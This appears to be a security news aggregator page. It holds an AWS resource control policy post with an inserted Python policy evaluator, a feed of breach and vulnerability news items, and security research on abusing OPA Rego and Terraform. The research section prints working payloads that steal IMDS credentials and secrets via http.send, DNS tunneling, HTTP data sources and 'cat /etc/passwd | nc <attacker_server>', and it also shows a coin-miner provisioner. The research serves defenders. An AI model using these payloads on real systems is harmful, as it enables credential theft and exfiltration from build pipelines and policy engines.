Tenable Cloud Security is a pioneer in the domain of cloud infrastructure entitlements management (CIEM), and we consider it an invaluable component of our cloud native application protection platform (CNAPP) solution. Being precise about what identities have access to is crucial to understanding the security risk that identities pose and are exposed to. For this reason, and as a close partner of AWS, we’ve already integrated the new RCP logic into our analysis of the permissions granted to identities. For example, below you see an IAM user granted access to many buckets in an external account by, most likely, a mistaken resource-based policy applied at scale. Here’s how it looks without an RCP applied:

[Screenshot: IAM user with overprivileged access to multiple buckets, far more access than to the specific bucket needed, without an RCP in place]

And here is how it looks with the RCP applied. The RCP limits access to the buckets based on their name pattern:

[Screenshot: With the RCP in place, an IAM user who had overprivileged access to multiple buckets now has access to just one specific bucket, which is still overprivileged, but due to the kind of actions available]

Spot the difference? The second finding factors in the RCP and only alerts about excessive permissions granted on the specific bucket, where some actions are needed. This becomes clearer as we see the recommendation for a least-privilege policy generated by Tenable Cloud Security, showing exactly which actions the identity requires with regard to this resource:

[Screenshot: Least privilege policy recommendation based on actual activity performed by the identity]

You can now focus on reducing this specific overpermissiveness not controlled by the RCP.

Conclusion

First of all, kudos to AWS for delivering on this feature. There are many potential benefits from using RCPs to apply resource-based boundaries at scale. While there’s plenty of room for RCPs to grow to support more features and services, we believe organizations should start to employ this control as part of their IAM strategy right away. Simplify AWS cloud security with protection for hybrid and multi-cloud and visit us at AWS re:Invent in Las Vegas next month at booth #520!
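As an added example (this is not code from the Tenable post, nor from AWS), here is a small offline evaluator for Deny statements of the kind shown in the Usage section, together with a pre-attach lint for the restrictions the post lists under "Don't cause denial-of-service", "Services supported" and "Quotas". The policies in it are constructed to mirror the post's examples: the Sids, the 203.0.113.0/24 range standing in for <IP_ADDRESS>, and the 111122223333 account id are placeholders, and only the four condition operators those policies use are implemented. Real AWS evaluation also involves SCPs, identity and resource policies and many more operators, so this is a way to reason about an RCP before it is tested in a lower environment, not a substitute for that test.

```python
"""Added example (not Tenable's or AWS's code): offline evaluator for Deny statements like
those above, plus a pre-attach lint for the RCP limits the post lists. Implements only the
operators the post's policies use (StringEquals, StringNotEquals, Bool, NotIpAddress)."""
import fnmatch
import ipaddress
import json

SUPPORTED_SERVICES = {"s3", "sts", "sqs", "kms", "secretsmanager"}  # per the post
MAX_POLICY_CHARS = 5120                                             # per the post
SERVICE_EXEMPTION_KEYS = {"aws:PrincipalIsAWSService", "aws:PrincipalServiceName"}


def _values(v):  # policy elements may be a string or a list
    return v if isinstance(v, list) else [v]


def _condition_matches(cond, ctx):
    """True when every operator/key pair matches the request context. As in IAM, a positive
    operator on an absent key does not match; a negated one (StringNotEquals, NotIpAddress) does."""
    for op, pairs in cond.items():
        for key, expected in pairs.items():
            expected = [str(e) for e in _values(expected)]
            actual = ctx.get(key)
            if op == "StringEquals":
                if actual is None or str(actual) not in expected:
                    return False
            elif op == "StringNotEquals":
                if actual is not None and str(actual) in expected:
                    return False
            elif op == "Bool":
                if actual is None or str(actual).lower() != expected[0].lower():
                    return False
            elif op == "NotIpAddress":
                if actual is not None:
                    ip = ipaddress.ip_address(actual)
                    if any(ip in ipaddress.ip_network(c, strict=False) for c in expected):
                        return False
            else:
                raise ValueError(f"operator {op} is not implemented in this example")
    return True


def rcp_denies(policy, req):
    """Sid (or index) of the first Deny statement matching req = {action, resource, context},
    else None. Actions match case-insensitively; ARN wildcards match as in IAM ('*' spans '/')."""
    for i, st in enumerate(policy["Statement"]):
        if st.get("Effect") != "Deny":
            continue
        act = req["action"].lower()
        if not any(fnmatch.fnmatchcase(act, a.lower()) for a in _values(st.get("Action", []))):
            continue
        res = req["resource"]
        if "NotResource" in st:  # supported in RCPs: the statement covers everything else
            if any(fnmatch.fnmatchcase(res, r) for r in _values(st["NotResource"])):
                continue
        elif not any(fnmatch.fnmatchcase(res, r) for r in _values(st.get("Resource", []))):
            continue
        if _condition_matches(st.get("Condition", {}), req["context"]):
            return st.get("Sid", f"Statement[{i}]")
    return None


def lint_rcp(policy):
    """Findings to review before attaching an RCP, based on the limits in the post."""
    findings = []
    if len(json.dumps(policy)) > MAX_POLICY_CHARS:
        findings.append(f"policy exceeds {MAX_POLICY_CHARS} characters")
    for i, st in enumerate(policy["Statement"]):
        sid = st.get("Sid", f"Statement[{i}]")
        if "NotAction" in st:
            findings.append(f"{sid}: NotAction is not supported in RCPs")
        if "NotPrincipal" in st or st.get("Principal") != "*":
            findings.append(f'{sid}: Principal must be "*"; scope principals with aws:PrincipalArn/aws:PrincipalAccount')
        for a in _values(st.get("Action", [])):
            if a != "*" and a.split(":")[0].lower() not in SUPPORTED_SERVICES:
                findings.append(f"{sid}: action {a} targets a service RCPs do not support")
        cond_keys = {k for pairs in st.get("Condition", {}).values() for k in pairs}
        if st.get("Effect") == "Deny" and not cond_keys & SERVICE_EXEMPTION_KEYS:
            findings.append(f"{sid}: Deny may also hit AWS service principals; consider aws:PrincipalIsAWSService")
    return findings


# Constructed policies mirroring the post's examples (Sids added so results are readable).
SENSITIVE_BUCKET_RCP = {"Version": "2012-10-17", "Statement": [{
    "Sid": "DenyDevOnSensitive", "Effect": "Deny", "Principal": "*", "Action": "s3:*",
    "Resource": "arn:aws:s3:::testing-rcp-pattern-sensitive-bucket-*",
    "Condition": {"StringEquals": {"aws:PrincipalTag/Department": "Dev"}}}]}
SOURCE_IP_RCP = {"Version": "2012-10-17", "Statement": [{  # 203.0.113.0/24 stands in for <IP_ADDRESS>
    "Sid": "DenyOutsideCorpRange", "Effect": "Deny", "Principal": "*", "Action": "s3:*", "Resource": "*",
    "Condition": {"NotIpAddress": {"aws:SourceIp": "203.0.113.0/24"}}}]}
TLS_AND_SSE_RCP = {"Version": "2012-10-17", "Statement": [
    {"Sid": "DenyPlaintext", "Effect": "Deny", "Principal": "*", "Action": "s3:*", "Resource": "*",
     "Condition": {"Bool": {"aws:SecureTransport": "false"}}},
    {"Sid": "DenyUnencryptedPut", "Effect": "Deny", "Principal": "*", "Action": "s3:PutObject", "Resource": "*",
     "Condition": {"StringNotEquals": {"s3:x-amz-server-side-encryption": "AES256"}}}]}
BAD_RCP = {"Version": "2012-10-17", "Statement": [{  # deliberately breaks the post's constraints; placeholder account id
    "Effect": "Deny", "NotPrincipal": {"AWS": "arn:aws:iam::111122223333:root"}, "Action": "ec2:*", "Resource": "*"}]}
```

Call rcp_denies(policy, request) with a request dict carrying the action, the resource ARN and a context dict of condition keys; it returns the Sid of the first matching Deny statement, or None when the RCP leaves the request untouched. lint_rcp(policy) returns the findings as a list of strings. Two behaviours worth noticing, both of which mirror how IAM evaluates these operators: an s3:PutObject request without the s3:x-amz-server-side-encryption key is denied by the SSE policy, and a request with no aws:SourceIp in its context is denied by the source-IP policy, which is exactly how an over-broad RCP can lock out service principals or third-party tooling.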
by Tenable
2024-11-18 13:00:00
Gen AI could speed up coding, but businesses should still consider risks
Organizations keen to fund gen AI-powered software development for the anticipated benefits should also understand that this may come with adverse effects.
by ZDNET Security
2024-11-18 12:53:04
Black Friday or Black Fraud-day? A Prime Time for Fraud and Cyberattacks
As Black Friday approaches, shoppers eagerly anticipate major discounts and deals, hoping to snag a bargain. However, the surge in online shopping comes with a darker side: an increase in fraud and cyberattacks. The UK’s National Cyber Security Centre (NCSC) has issued a warning on the rise of hackers on Black Friday, which is increasingly being dubbed “Black Fraud Day.” According to recent data from Action Fraud, UK consumers lost over £11.5 million to online scams during the holiday period last year, with the vast majority of these incidents linked to fraudulent purchases made during Black Friday and Cyber Monday. This represents an alarming increase of nearly £1 million compared to the previous year. The statistics underline the growing sophistication of scammers, including Black Friday hackers who are exploiting online shopping platforms to target unsuspecting shoppers.

Cybersecurity experts have highlighted how fraudsters are using advanced techniques, including artificial intelligence (AI), to craft highly convincing scams. These AI-driven attacks can be difficult to detect, making it even more crucial for shoppers to be vigilant during the Black Friday sale. Fraudsters may use fake websites, social media ads, or phishing emails to lure victims into entering sensitive personal and financial information.

The Role of Hackers on Black Friday

With so much of the population shopping online for Black Friday deals, it’s no surprise that hackers are eager to capitalize on this lucrative time. A key tactic used by cybercriminals is to create a false sense of urgency, enticing shoppers with limited-time offers or extremely low prices. This strategy plays on consumers' fear of missing out, driving them to make quick, unwise decisions that put them at risk of fraud.

The NCSC's Richard Horne emphasized that cyber criminals often target the eagerness of consumers during the Black Friday rush, utilizing both traditional methods and more sophisticated AI-driven attacks to catch people off guard. “Unfortunately, this is also prime time for cyber criminals, who exploit bargain hunters with increasingly sophisticated scams,” Horne stated. In addition to phishing scams, Black Friday hackers often take advantage of unsecured websites and online marketplaces to carry out their attacks. Whether it's a fake listing on a social media platform or a malicious link sent via email, these attacks can leave shoppers vulnerable to identity theft, financial loss, or worse.

Tips to Stay Safe During the Black Friday Sale

To help shoppers avoid falling victim to Black Friday cyberattacks, the NCSC and Action Fraud have provided a set of practical tips. First and foremost, experts recommend enabling two-factor authentication (2FA) on all important online accounts. This added layer of security can help prevent unauthorized access, even if a hacker has obtained your password. Another crucial piece of advice is to avoid clicking on links or offers from unverified sources. Scammers often use social media platforms and messaging apps to promote deals that seem too good to be true. Before making a purchase, always take the time to research the company or seller, checking reviews on trusted websites and ensuring that their website is secure (look for “https” in the URL). Fraud Minister Lord Hanson also weighed in on the importance of vigilance, urging shoppers to trust their instincts. “If something doesn’t feel right, stop what you’re doing, break contact, and do not click any links,” he advised.

Avoiding the Pitfalls of Social Media and Online Marketplaces

Online marketplaces and social media platforms have become a significant source of fraudulent activity during the Black Friday sale. In fact, 43% of fraud reports last year mentioned social media platforms, and nearly 19% of cases were linked to online marketplaces. Shoppers should be especially cautious when making purchases through these channels. Adam Mercer, Deputy Head of Action Fraud, cautioned consumers to avoid feeling pressured into making impulsive purchases. “A false sense of urgency is a tell-tale sign of a fraudster,” he said. If something seems too good to be true, it probably is. Mercer also recommended using credit cards instead of bank transfers for online purchases, as credit cards typically offer fraud protection.
by The Cyber Express
2024-11-18 12:22:54
Simple tips for a safer digital life | Kaspersky official blog
Five tips to enhance your cybersecurity.
by Kaspersky
2024-11-18 12:16:15
From Declarative to Iterative: How Software Development Is Evolving
AI is changing the way code is generated so developers can gain more speed advantages. Embedded capabilities in IDEs and low-code platforms help.
by ITPro Today
2024-11-18 12:12:56
Fortinet VPN Zero-Day Exploited in Malware Attacks Remains Unpatched: Report
The DeepData malware framework was seen exploiting a Fortinet VPN client for Windows zero-day that remains unpatched.
by SecurityWeek
2024-11-18 12:05:41
Fake Bitwarden ads on Facebook push info-stealing Chrome extension
Fake Bitwarden password manager advertisements on Facebook are pushing a malicious Google Chrome extension that collects and steals sensitive user data from the browser. [...]
by BleepingComputer
2024-11-18 12:00:00
Proton VPN review: A very solid free VPN with robust leak protection
Proton VPN is our pick for the best free VPN. Here's why, based on our testing.
by ZDNET Security
2024-11-18 11:54:17
World Wide Web Inventor Tim Berners-Lee Wants the Internet Back
The inventor of the World Wide Web is on a laudable mission to give everyone control of their online data. He's fighting an uphill battle.
by ITPro Today
2024-11-18 11:39:01
Mozilla 0Din Warns of ChatGPT Sandbox Flaws Enabling Python Execution
Mozilla’s 0Din uncovers critical flaws in ChatGPT’s sandbox, allowing Python code execution and access to internal configurations. OpenAI…
by Hackread
2024-11-18 11:35:52
AnnieMac Data Breach Impacts 171,000 People
AnnieMac Home Mortgage is informing over 171,000 individuals that their data has been compromised in a hacker attack.
by SecurityWeek
2024-11-18 11:31:04
CERT-In Flags Two High-Risk Cisco Vulnerabilities Targeting Key Infrastructure

Overview

The Indian Computer Emergency Response Team (CERT-In) has recently added two Cisco vulnerabilities to its catalog. Both vulnerabilities target Cisco products, with high severity ratings and potential for impacts on the confidentiality, integrity, and availability of affected systems.

The first vulnerability, CVE-2024-20536, affects Cisco’s Nexus Dashboard Fabric Controller (NDFC), specifically versions 12.1.2 and 12.1.3. The flaw is found in the REST API endpoint and web-based management interface, and it could allow an authenticated, remote attacker with read-only privileges to execute arbitrary SQL commands on an affected device. The vulnerability arises due to insufficient input validation. An attacker with read-only privileges could exploit this flaw by sending specially crafted requests to the affected device's REST API or management interface, bypassing input validation and potentially modifying or deleting data in the internal database. Exploiting this vulnerability could lead to denial of service (DoS) conditions and a significant disruption of operations.

The severity of the vulnerability is classified as high. It affects Cisco NDFC versions 12.1.2 and 12.1.3, making these systems particularly vulnerable to exploitation. The potential impact includes data manipulation, which could allow attackers to alter sensitive information, and service disruption, potentially leading to system downtime. Furthermore, there is a risk of data leakage, where unauthorized individuals may access and expose confidential data stored within the affected systems. This vulnerability does not affect Cisco NDFC when it is configured as a Storage Area Network (SAN) controller. However, for organizations using the affected versions of Cisco NDFC, the potential risks are significant, especially in terms of data integrity and availability.

CVE-2024-20484: Denial of Service in Cisco Enterprise Chat and Email (ECE)

The second vulnerability, CVE-2024-20484, affects Cisco Enterprise Chat and Email (ECE) versions 12.6 and earlier, running the External Agent Assignment Service (EAAS). This vulnerability could allow unauthenticated, remote attackers to trigger a Denial of Service (DoS) condition, disrupting the availability of the ECE system. The vulnerability lies in the way Cisco ECE handles Media Routing Peripheral Interface Manager (MR PIM) traffic. An attacker could exploit this flaw by sending specially crafted MR PIM traffic, causing a failure in the MR PIM connection between Cisco ECE and Cisco Unified Contact Centre Enterprise (CCE). This failure leads to a denial-of-service condition, rendering the ECE system inoperable. This issue primarily affects organizations using Cisco ECE for enterprise communication. A successful attack could lead to widespread disruptions, affecting internal communications and customer service operations.

Cisco’s Broader Vulnerability Landscape: A Year of Increased Threats

While CVE-2024-20484 and CVE-2024-20536 are the latest additions to the catalog of known vulnerabilities, Cisco has had a series of high-severity vulnerabilities throughout the year. In addition to these new vulnerabilities, Cyble recently reported on a critical flaw in the Unified Industrial Wireless Software for Ultra-Reliable Wireless Backhaul (URWB), tracked as CVE-2024-20418. This vulnerability, with a CVSS score of 10.0 (the highest possible severity), allows attackers to gain root-level access to vulnerable Cisco devices. Exploiting this flaw can enable unauthorized command execution on affected systems, making it one of the most dangerous vulnerabilities in Cisco's product lineup this year. The CVE-2024-20418 vulnerability affects Cisco Catalyst Access Points operating in URWB mode, such as the Catalyst IW9165D, IW9165E, and IW9167E models. Attackers can exploit this flaw by sending specially crafted HTTP requests to the affected device, injecting commands with root privileges, and gaining control over the device. Exploiting this vulnerability could lead to compromises in industrial and high-stakes environments.

Moreover, Cyble sensors have previously detected cyberattacks targeting the “/+CSCOE+/logon.html” URL, which is linked to Cisco ASA's WebVPN Login Page. Vulnerabilities like XSS, path traversal, and HTTP response splitting could allow attackers to execute code, steal data, or disrupt services.

Conclusion

The disclosure of these Cisco vulnerabilities, like CVE-2024-20484 and CVE-2024-20536, stresses the growing risk of exploitation in critical infrastructure, particularly in widely used systems like Cisco products. As Cyble and other threat intelligence firms have noted, cybercriminals are increasingly targeting known vulnerabilities, employing tactics such as brute-force attacks and leveraging the dark web to spread exploits. With vulnerabilities continuing to be discovered and actively targeted, organizations must prioritize patch management, implement strong security measures, and conduct regular vulnerability assessments. By staying on guard and proactive in updating systems, segmenting networks, and monitoring suspicious activity, businesses can better defend against online threats.
by CYBLE
2024-11-18 11:27:59
18th November – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 11th November, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
The FBI and CISA issued a joint statement detailing a major Chinese cyber-espionage campaign targeting U.S. telecommunications infrastructure, led by the APT group Salt Typhoon. This operation compromised networks to steal call […]
by Check Point Research
2024-11-18 11:22:00
NSO Group Exploited WhatsApp to Install Pegasus Spyware Even After Meta's Lawsuit
Legal documents released as part of an ongoing legal tussle between Meta's WhatsApp and NSO Group have revealed that the Israeli spyware vendor used multiple exploits targeting the messaging app to deliver Pegasus, including one even after it was sued by Meta for doing so. They also show that NSO Group repeatedly found ways to install the invasive surveillance tool on the target's devices as
by The Hacker News
2024-11-18 11:10:38
The 4 Checkboxes of Scalable AI in the Enterprise
Discover the key strategies enterprises need — talent, efficiency, infrastructure, and cohesion — to scale generative AI projects and sustain long-term competitive advantage.
by ITPro Today
2024-11-18 11:00:06
The Stealthy Success of Passkeys
It’s interesting to note that many people will happily unlock their phone by just looking at it and have no problem tapping their bank card against a store’s point of sale terminal, but if the term password security is presented to them, they have a blank expression, or worse, shrink away. Why are some technologies […]
by IT Security Guru
2024-11-18 10:23:48
Satellite Maker Maxar Space Systems Confirms Data Breach
Maxar Space Systems, a leading global innovator in satellite manufacturing and space technology, recently reported a data breach that exposed sensitive employee information. The breach was disclosed in a notification to affected individuals, a sample of which was submitted to the California authorities. According to the notification, Maxar discovered unauthorized access to its systems, prompting …
by Cyber Insider
2024-11-18 10:22:00
Urgent: Critical WordPress Plugin Vulnerability Exposes Over 4 Million Sites
A critical authentication bypass vulnerability has been disclosed in the Really Simple Security (formerly Really Simple SSL) plugin for WordPress that, if successfully exploited, could allow an attacker to remotely gain full administrative access to a susceptible site. The vulnerability, tracked as CVE-2024-10924 (CVSS score: 9.8), impacts both free and premium versions of the plugin. The
by The Hacker News
2024-11-18 10:10:00
Library of Congress Says an Adversary Hacked Some Emails
The Library of Congress has notified lawmakers of a “cyber breach” of its IT system by an adversary and a hack of emails.
by SecurityWeek
2024-11-18 10:00:24
T-Mobile is one of the victims of the massive Chinese breach of telecom firms
T-Mobile confirmed being a victim of recent hacking campaigns linked to China-based threat actors targeting telecom companies. T-Mobile confirms it was hacked as part of a long-running cyber espionage campaign targeting Telco companies. Recently, the FBI and CISA announced they are continuing to investigate a large-scale cyber-espionage campaign by China-linked threat actors targeting U.S. telecoms, […]
by Security Affairs
2024-11-18 09:53:16
Cloud vs. On-Prem AI Accelerators: Choosing the Best Fit for Your AI Workloads
Know the pros and cons of cloud-based AI accelerators before deciding whether cloud or on-prem AI hardware aligns best with your workload requirements.
by ITPro Today
2024-11-18 09:33:42
Exploitation of SVG attachments in phishing on the rise
While SVG primarily enables the crafting of images using text, lines, and shapes in code rather than pixels, such files could also be utilized to show HTML and facilitate JavaScript execution in credential-stealing phishing forms.
by SC Media
2024-11-18 09:31:28
T-Mobile Also Targeted in Chinese Telecom Hacking Campaign
T-Mobile has also been targeted by the Chinese group Salt Typhoon in a major espionage campaign targeting US telecom companies.
by SecurityWeek
2024-11-18 09:30:02
Millions of WordPress sites potentially hijackable due to critical plugin bug
Malicious actors could leverage the vulnerability, which stems from improper user check error management in the two-factor REST API action, to facilitate high-privileged account breaches that could then be used for additional attacks, according to Defiant, a WordPress security provider.
by SC Media
2024-11-18 09:20:32
WhatsApp zero-day exploited by NSO Group post lawsuit
While WhatsApp proceeded to disable the "Eden" exploit leveraged by NSO Group, the Israeli firm proceeded to create the "Erised" vector to target the app's users until May 2020, noted a court filing from Meta, which also noted that NSO Group, and not its customers, was primarily behind the spyware attacks.
by SC Media
2024-11-18 09:18:14
Israel subjected to Iranian attacks with new WezRat infostealer
Malicious emails spoofing Israel's National Cyber Directorate have been leveraged by Cotton Sandstorm to lure targeted entities into downloading a Google Chrome security update, which facilitates the delivery of WezRAT, a tool that enables file downloading, screenshot capturing, keystroke logging, clipboard content extraction, and Chromium browser cookie compromise.
by SC Media
2024-11-18 09:05:36
Novel PXA Stealer leveraged by Vietnamese hackers
Attackers delivered phishing emails with a ZIP file attachment containing an executable Rust-based loader, which launches Windows batch scripts that not only open lure documents but also facilitate the deactivation of antivirus software prior to the deployment of the Python-based information-stealing malware, an analysis from Cisco Talos showed.
by SC Media
2024-11-18 09:00:00
The Dark Side of Domain-Specific Languages: Uncovering New Attack Techniques in OPA and Terraform
Check out our deep dive into both new and known techniques for abusing infrastructure-as-code and policy-as-code tools. You'll also learn how to defend against them in this blog post, which expands on the attack techniques presented at our fwd:cloudsec Europe 2024 talk "Who Watches the Watchmen? Stealing Credentials from Policy-as-Code Engines (and beyond)."

Infrastructure-as-code (IaC) is the backbone of DevOps for modern cloud applications. Policy engines and policy-as-code languages have emerged as key tools to govern IaC deployments, due to their sensitivity and complexity. They are also a common tool for authorization in cloud-native applications and admission control in Kubernetes.

In this blog post, we will explore both known and newly uncovered attack techniques in domain-specific languages (DSLs) of popular policy-as-code (PaC) and infrastructure-as-code (IaC) platforms, specifically in the open source Open Policy Agent (OPA) and in HashiCorp's Terraform. Since these are hardened languages with limited capabilities, they're supposed to be more secure than standard programming languages, and indeed they are. However, more secure does not mean bulletproof. We'll explore specific techniques we discovered which adversaries can use to manipulate these DSLs through third-party code, leading to compromised cloud identities, lateral movement and data exfiltration.

Attack techniques deep dive

Open Policy Agent (OPA)

OPA is a widely used policy engine. You can use it for various use cases, from microservice authorization to infrastructure policies. Basically, OPA can analyze and make policy decisions based on any data in JavaScript Object Notation (JSON) form. It shifts policy decision-making away from the target application, allowing the application to query OPA and focus solely on enforcing the decisions OPA makes based on the provided input and policies.
Policies in OPA are written using Rego, a dedicated high-level, declarative policy language, or DSL, if you will. We will soon see that Rego has some interesting built-in functions that, in the wrong hands, can be used to do some pretty evil things.

Attack scenario

Our research focused on the supply-chain attack vector in OPA, and more specifically on the case where an attacker gains access to the supply chain of OPA's policies. Attackers can leverage this vector to insert a malicious Rego policy that will be executed during policy evaluation, to achieve malicious objectives like credential exfiltration. In this scenario, OPA regularly fetches policies from a storage bucket, and a web application relies on OPA for authorization. All is well until an attacker gains access through a compromised access key, needing only write access to the policy bucket. The attacker uploads a malicious policy, which OPA retrieves during its next local update. When the web application sends an authorization request, OPA performs the policy evaluation and executes the malicious Rego code, potentially leading to dangerous outcomes, such as leaking sensitive data to an attacker-controlled server.

Exfiltrating source code and environment variables

We could only find a single blog post exploring malicious abuse of Rego. In it, software engineer Liam Galvin showcased built-in OPA functions that attackers could abuse: opa.runtime().env for accessing environment variables and http.send for exfiltrating them. Additionally, the input keyword can be used to exfiltrate HCL code sent to OPA.

Taking it further

The opa.runtime and http.send functions got some bad attention in 2022, when a researcher discovered a vulnerability bypassing the WithUnsafeBuiltins function, which can be used to block certain built-in functions and fail policies that use them. These two functions were cited as examples of functions that organizations might want to block.
If an organization has some awareness of OPA security (and can block these functions without breaking its use case), it would probably block them through OPA's Capabilities feature. This got us thinking:

- Is it possible to fetch cloud credentials without using the opa.runtime function?
- Is it possible to leak data outside of the environment without using the http.send function?

Extracting credentials from IMDSv2

Using the OPA runtime function we can fetch environment variables, including potential cloud credentials. This sparked our curiosity: if its usage is blocked on the OPA server side, can we still extract cloud credentials somehow? We then decided to try fetching credentials from the AWS Instance Metadata Service (IMDS), considering that OPA might run on a cloud instance with an attached role. We used the bash commands from the AWS documentation as a reference, and crafted Rego code to interact with IMDSv2, which is the default in new environments and less straightforward to work with. This enabled us to retrieve instance role credentials and leak them to our external server using a single built-in function: http.send. It took several iterations. As anyone who has worked with Rego knows, it loves to keep you guessing with non-indicative errors.
Finally, this is what our code looked like:

    package extract_creds

    default token_ttl_seconds = "21600"

    req1 := {"url": "http://169.254.169.254/latest/api/token", "method": "put", "headers": {"X-aws-ec2-metadata-token-ttl-seconds": token_ttl_seconds}}
    resp1 := http.send(req1)

    req2 := {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/", "method": "get", "headers": {"X-aws-ec2-metadata-token": resp1["raw_body"]}}
    resp2 := http.send(req2)

    url_val := concat("/", ["http://169.254.169.254/latest/meta-data/iam/security-credentials", resp2["raw_body"]])
    req3 := {"url": url_val, "method": "get", "headers": {"X-aws-ec2-metadata-token": resp1["raw_body"]}}
    resp3 := http.send(req3)

    req4 := {"url": "http://<attacker_server>/", "method": "put", "headers": {"X-aws-ec2-metadata-token": resp3["raw_body"]}}
    resp4 := http.send(req4)

Attack demo

It's important to note that allowing policies, especially when sourcing them from third parties, to interact with other internal servers and services is highly discouraged and exposes the environment to significant risks like credential theft. We need to remember that IMDSv2 does not make your instance role credentials bulletproof. They are still reachable once code execution on the machine is achieved. At the end of this blog post, we reference some effective mitigations to defend against such attacks.

DNS tunneling

That's all well and good if we can run the http.send function within policies. But what happens if an OPA deployment restricts its use? We wanted to see whether it was possible to achieve data exfiltration by other means. We dove into OPA's documentation again, and the Net category's net.lookup_ip_addr function looked particularly interesting: it actively looks up a host, and returns its IP address.
So we thought: what if we look up a domain under the attacker's control and monitor the DNS requests?

We set up a server to capture the DNS requests and ran a simple policy using the net.lookup_ip_addr function. Sure enough, we could see a request coming to our server. What about trying to embed sensitive data as a subdomain of our malicious domain (aka DNS tunneling)? We concatenated an access key that was hard-coded in the input Terraform configuration passed to OPA, as a subdomain of our domain, and passed the new domain string to the net.lookup_ip_addr function. We then ran the Rego policy.

    package dns_tunneling

    parent_domain := "<attacker_domain>"

    # Form the domain tunneling string and perform the lookup
    result = domain_str {
        provider_list := input.provider.aws
        provider_list != []
        provider := provider_list[0]
        access_key := provider.access_key
        secret_key := provider.secret_key
        domain_arr := [access_key, secret_key, parent_domain]
        domain_str := concat(".", domain_arr)
        addr := net.lookup_ip_addr(domain_str)
    }

And, voilà! The request, with the access key embedded in it, arrived at our listener.

Left side: server listening for DNS requests. Right side: victim OPA server running the malicious policy.

So, the net.lookup_ip_addr function is another function you might consider restricting, or at least looking out for in policies, since it also introduces the risk of data exfiltration from your OPA deployment.

Up until this point, we've talked about techniques in OPA, which is a policy engine. We were curious about Terraform, since it also uses a declarative language, and wanted to see if it might be affected by similar techniques.

Terraform

Terraform has long been a highly adopted IaC tool due to its declarative, platform-agnostic nature, community support and shareable components. Configurations in Terraform are also written using a dedicated high-level, declarative DSL: HashiCorp Configuration Language (HCL).
Terraform has two kinds of third-party components that can be shared through the Terraform Registry or other (public or private) registries: modules and providers. These are commonly used for efficiency, and even for enhanced security when used right. However, if used carelessly, they can introduce a serious supply chain risk.

Terraform CI/CD risk

Using HashiCorp's "Setup Terraform" GitHub Action, many organizations configure every pull request to trigger the format, init, validate and plan phases of Terraform. Moreover, HashiCorp's documentation presents the option to test pull requests using terraform plan. It seems logical that the plan phase triggers on every PR in a Terraform code repository to identify necessary changes before applying them. Or does it?

Screenshot taken from the README of HashiCorp's GitHub action: https://github.com/hashicorp/setup-terraform

It appears that the plan phase is not as innocent as one might think. While resources are not deployed during this stage, data sources, which are another kind of block in Terraform that allows fetching external data to be used throughout the configuration, do execute at this stage.

To recap, in many CI/CD pipelines today, terraform plan runs as part of a pull_request trigger. This means that any developer who can open a pull request (usually any developer in open-source projects, or any developer in the organization in private repositories) can trigger code execution on the GitHub runner without any code review, assuming they are able to update Terraform files.
This poses a risk, as an external attacker in a public repository, or a malicious insider (or an external attacker with a foothold) in a private repository, could exploit a pull request for their malicious objectives.

Example of malicious techniques for abusing data sources

As we just learned, data sources run during terraform plan, which significantly lowers the entry point for attackers, making it possible, in some repositories, to execute unreviewed changes during CI/CD. (Note: to use a data source in a Terraform configuration, you need to import the provider that implements it.)

External data source

Using the external data source, you can run custom code on the machine running Terraform. According to HashiCorp, the external data source serves as an "escape hatch" for exceptional situations. Its abuse was also explored in Alex Kaskaso's blog, demonstrating how you can run code during the Terraform plan phase by writing custom Terraform providers, or by using the external data source from the existing external provider.

To achieve code execution on the host, you simply need to import the external provider and insert an external data block in your configuration, referencing a local script file:

    data "external" "example" {
      program = ["python", "${path.module}/exfil_env_results.py"]
    }

HTTP data source

Using the HTTP data source, you can fetch necessary data for your configuration, but it also opens the door to malicious exfiltration. As xssfox demonstrated, a malicious Terraform module can easily leak secrets to an attacker-controlled domain.

The HTTP data source may also be effective for fetching credentials from the IMDS.
However, I couldn't extract creds from IMDSv2 since it requires the HTTP PUT method, which HCL doesn't permit: only GET, HEAD, and POST are allowed.

    data "http" "supersecurerequest" {
      url = "https://<attacker_server>/${aws_secretsmanager_secret_version.secret_api_key.secret_string}"
    }

DNS data source

As we previously discussed, we discovered a DNS tunneling technique in OPA, allowing us to stealthily leak sensitive data. This got us thinking: why not try DNS tunneling in Terraform, too?

We looked into HashiCorp's documentation, and found HashiCorp's official DNS provider. Similarly to Rego's net.lookup_ip_addr, its data sources allow you to perform DNS lookups. Once again, we tried embedding a secret as a subdomain of our malicious domain. We then listened for DNS requests, and ran terraform plan in the hope of catching the secret on our external server.

    data "dns_a_record_set" "superlegitdomain" {
      host = "${aws_secretsmanager_secret_version.password.secret_string}.<attacker_domain>"
    }

And, boom! The request, including the embedded secret string, was caught by our listener.

To recap, here's the flow of events:

- terraform plan triggers on a pull request
- The unreviewed code includes a malicious data source
- Before the DevOps engineer can say 'supercalifragilisticexpialidocious,' the sensitive data is already off to the attacker's server

Example of malicious techniques for abusing provisioners

HashiCorp states that provisioners are a last resort, saying that they allow you to "model specific actions on the local machine or on a remote machine in order to prepare servers or other infrastructure objects for service". Or, in simple words, you can run custom code on the machine running Terraform or on the newly provisioned infrastructure.

"Local-exec" provisioner

The local-exec provisioner "invokes a local executable after a resource is created" according to HashiCorp.
It runs the supplied command on the machine running Terraform, basically allowing any Bash command execution. For example, you could leak the contents of /etc/passwd to an attacker-controlled server:

    provisioner "local-exec" {
      command = "cat /etc/passwd | nc <attacker_server> 1337"
    }

"Remote-exec" provisioner

The remote-exec provisioner "invokes a script on a remote resource after it is created" according to HashiCorp. It allows you to run custom code on newly provisioned infrastructure. For example, you could run a coin miner on a newly created EC2 machine:

    provisioner "remote-exec" {
      script = "./xmrig/xmrig.sh"
    }

Other notable Terraform research

Security engineers Mike Ruth and Francisco Oca demonstrated multiple attack scenarios against Terraform Enterprise (TFE) and Terraform Cloud (TFC) and also released a tool that can stealthily run terraform apply during terraform plan.

Some interesting attack primitives were discovered by Daniel Grzelak from Plerion, who demonstrated how you can delete resources or run malicious code through a custom provider, with the only access required for the attack being write access to the state file, which is often stored in S3.

Mitigations and best practices

- Implement granular role-based access control (RBAC) and follow the principle of least privilege. This should be applied to the local user running the IaC or PaC framework, the users that can access it via API, and the associated cloud roles. Separate roles may be used for the Terraform plan and apply stages, to prevent unreviewed modifications of IaC from resulting in cloud infrastructure changes.
